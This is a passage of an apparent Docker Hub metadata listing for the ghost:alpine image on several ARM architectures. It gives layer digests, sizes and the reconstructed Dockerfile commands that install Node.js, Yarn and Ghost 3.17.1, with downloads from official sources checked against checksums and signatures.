Size: 2.2 MB (2239066 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5c89d818d1fec3df1d4a708492894de475c4daa5f8053a4d589d9b0484e2c099`
Last Modified: Tue, 26 May 2020 22:48:21 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9047e99c8937584e2f6b1ab3841c7eb0c0dbdbe720b44c541f49d2bce3976aba`
Last Modified: Tue, 26 May 2020 23:11:39 GMT
Size: 9.9 KB (9904 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d459bac936303ed7b3e824328df49eac57898ae1ccd036eca9950e0959ed671a`
Last Modified: Tue, 26 May 2020 23:11:39 GMT
Size: 780.5 KB (780510 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:16a5d271dfde67d858beff79b47ba871470e9ff7ee15a9dcc3b0ac38d72362f6`
Last Modified: Tue, 26 May 2020 23:11:42 GMT
Size: 7.0 MB (7011442 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c458630d7f8ab505a0d13dc5ffb4aef556fa9fae25f602b21772af1ce9e0e1a3`
Last Modified: Tue, 26 May 2020 23:11:55 GMT
Size: 71.4 MB (71427412 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a71cb63cc937a976db35f155a25a452bfefc058d123d8d1a80050221d266fddd`
Last Modified: Tue, 26 May 2020 23:11:39 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; arm variant v6
```console
$ docker pull ghost@sha256:6b16f2c13b2b3234d18f913b5a5861cef784023a10838f6407e43ffa19c919e9
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **92.4 MB (92356900 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:17f63fdb9e542a0ebdda5de930e750db7d1e4565734fe4891b51bcabe0f1c554`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 15:51:24 GMT
ADD file:cc0770cddff6b50d5e31f39886420eb8a0b4af55664d6f7599207c9aeaf6a501 in /
# Thu, 23 Apr 2020 15:51:25 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:58:14 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 23:09:11 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 23:09:12 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 23:09:19 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 23:09:19 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 23:09:20 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:09:20 GMT
CMD ["node"]
# Tue, 26 May 2020 23:37:40 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:37:42 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:37:43 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:37:43 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:38:23 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:38:26 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:38:27 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:38:27 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:45:42 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:45:46 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:45:47 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:45:47 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:45:48 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:45:48 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:45:49 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:b9e3228833e92f0688e0f87234e75965e62e47cfbb9ca8cc5fa19c2e7cd13f80`
Last Modified: Thu, 23 Apr 2020 15:52:05 GMT
Size: 2.6 MB (2619936 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:994277a788b748b466efc6badd343f22afd5bb19078b2eff8e9b2a9a0c6dcab8`
Last Modified: Tue, 26 May 2020 23:10:59 GMT
Size: 24.1 MB (24146731 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8e3e71dbb316526675386b5fb23da51e7a1a674243c50e36c3aa4c2df457f1a2`
Last Modified: Tue, 26 May 2020 23:10:52 GMT
Size: 2.3 MB (2294520 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e3898eddc9e8d8197b99a99661bc451815ac200b298457d445e104da82c6bd8d`
Last Modified: Tue, 26 May 2020 23:10:51 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f47af75179fbb26b9a7dfe183252e3cc45d5b7ae8fcd8b44a23da5d524976e88`
Last Modified: Tue, 26 May 2020 23:46:24 GMT
Size: 9.7 KB (9729 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:25fd339156a8af00dcd7f9447ca383232f6a64ec5c243179204356b7a8d48579`
Last Modified: Tue, 26 May 2020 23:46:24 GMT
Size: 733.4 KB (733444 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9e5ffb0ed0a1b428aa62eb6fe9ee16c4ee6d772e57efd7e9d8248b05dd6c0343`
Last Modified: Tue, 26 May 2020 23:46:28 GMT
Size: 7.0 MB (7011515 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b7fcb9ae702c2de865bcb51e53b3dbca41fdd02be514ae9e4dfcd7d6356d07c5`
Last Modified: Tue, 26 May 2020 23:46:54 GMT
Size: 55.5 MB (55540200 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d65fd596ff685c7aacdb2833b28fb428253776da08922a2b826ea96ef3470e43`
Last Modified: Tue, 26 May 2020 23:46:24 GMT
Size: 543.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; arm variant v7
```console
$ docker pull ghost@sha256:188b1ee1974fec8802f1f98ad3abdf26ec6dc37c228271ddcad660da9e31d376
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **91.2 MB (91171084 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:a3d6e2e4db9d805f27fce6036a9491e9db7148656823b9408b348a9ced576c3c`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 22:04:19 GMT
ADD file:33578d3cacfab86c195d99396dd012ec511796a1d2d8d6f0a02b8a055673c294 in /
# Thu, 23 Apr 2020 22:04:22 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 23:21:14 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 23:31:23 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 23:31:26 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 23:31:39 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 23:31:41 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 23:31:43 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:31:45 GMT
CMD ["node"]
# Wed, 27 May 2020 00:03:15 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Wed, 27 May 2020 00:03:17 GMT
RUN apk add --no-cache bash
# Wed, 27 May 2020 00:03:18 GMT
ENV NODE_ENV=production
# Wed, 27 May 2020 00:03:19 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Wed, 27 May 2020 00:03:43 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Wed, 27 May 2020 00:03:45 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Wed, 27 May 2020 00:03:45 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Wed, 27 May 2020 00:03:46 GMT
ENV GHOST_VERSION=3.17.1
# Wed, 27 May 2020 00:08:11 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Wed, 27 May 2020 00:08:14 GMT
WORKDIR /var/lib/ghost
# Wed, 27 May 2020 00:08:14 GMT
VOLUME [/var/lib/ghost/content]
# Wed, 27 May 2020 00:08:15 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Wed, 27 May 2020 00:08:16 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 27 May 2020 00:08:16 GMT
EXPOSE 2368
# Wed, 27 May 2020 00:08:17 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:3cfb62949d9d8613854db4d5fe502a9219c2b55a153043500078a64e880ae234`
Last Modified: Thu, 23 Apr 2020 22:05:12 GMT
Size: 2.4 MB (2422063 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2363ebe8a93a363d6975fde20fcd45db8aea1c29b1c271c5f4d168d00890a98c`
Last Modified: Tue, 26 May 2020 23:38:00 GMT
Size: 23.7 MB (23707825 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3a891d27e71f361ccde7e63cd9e54867107fa935d174b447e7deb9efd8061fbc`
Last Modified: Tue, 26 May 2020 23:37:05 GMT
Size: 2.3 MB (2294549 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:eaed1f5294ca3759c414233ddf7857e828077797d8c6125c8bd9810584d133a7`
Last Modified: Tue, 26 May 2020 23:37:04 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:542efbfdd740f52f0b4127afa5f9c0d26002c8a03bd7fffb603f2b6c00fde3e5`
Last Modified: Wed, 27 May 2020 00:09:40 GMT
Size: 9.5 KB (9514 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0e78a0b2026eb2f843a4ef70ee919410cbdb0405be083fb1496eeba21985e42f`
Last Modified: Wed, 27 May 2020 00:09:40 GMT
Size: 669.0 KB (669031 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:971bd4d4b080d98cb7d96b705d83c82686a039f055919b860de732815237911c`
Last Modified: Wed, 27 May 2020 00:09:45 GMT
Size: 7.0 MB (7011445 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c9d1db669ca37615d0214724461d6b7cd5cfc82386641c1790bd26e43e4b04c7`
Last Modified: Wed, 27 May 2020 00:10:05 GMT
Size: 55.1 MB (55055832 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:cbf2d43ebe0a452facaedba8d5709e62a48ae3039e8da623310f10223800a35b`
Last Modified: Wed, 27 May 2020 00:09:40 GMT
Size: 543.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; arm64 variant v8
```console
$ docker pull ghost@sha256:c071a3282f975fdb2d7ab2bff38d66ffa04e12e80b9bafec711d0b1229762975
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **93.4 MB (93401270 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:cde00db8e0e2f3dc89cef477eeb98733fc8787783db27c0d18634ff78c1c4a3c`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Fri, 24 Apr 2020 00:14:18 GMT
ADD file:85ae77bc1e43353ff14e6fe1658be1ed4ecbf4330212ac3d7ab7462add32dd39 in /
# Fri, 24 Apr 2020 00:14:21 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:31:07 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 22:42:13 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 22:42:16 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 22:42:27 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 22:42:28 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 22:42:31 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:42:32 GMT
CMD ["node"]
# Tue, 26 May 2020 23:04:43 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:04:48 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:04:49 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:04:50 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:05:21 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:05:23 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:05:24 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:05:26 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:10:47 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:10:53 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:10:53 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:10:54 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:10:55 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:10:55 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:10:56 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:29e5d40040c18c692ed73df24511071725b74956ca1a61fe6056a651d86a13bd`
Last Modified: Fri, 24 Apr 2020 00:15:41 GMT
Size: 2.7 MB (2724424 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:7a0645aba79184b4b2f8746b951cd4f319eaad9894739aa71726e80e7454bd7a`
Last Modified: Tue, 26 May 2020 22:49:44 GMT
Size: 24.9 MB (24864671 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:aaf79fc3473c4e5879fc6ec74fda103961b7e6a2c89dd7e21c06085e40ee2559`
